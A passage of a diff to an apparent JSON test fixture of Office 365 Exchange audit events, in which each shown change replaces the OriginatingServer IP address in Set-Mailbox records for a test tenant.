(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1740,7 +1740,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1814,7 +1814,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1826,7 +1826,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1900,7 +1900,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1912,7 +1912,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -1986,7 +1986,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -1998,7 +1998,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "ProhibitSendReceiveQuota", @@ -2080,7 +2080,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2092,7 +2092,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2166,7 +2166,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2178,7 +2178,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -2252,7 +2252,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 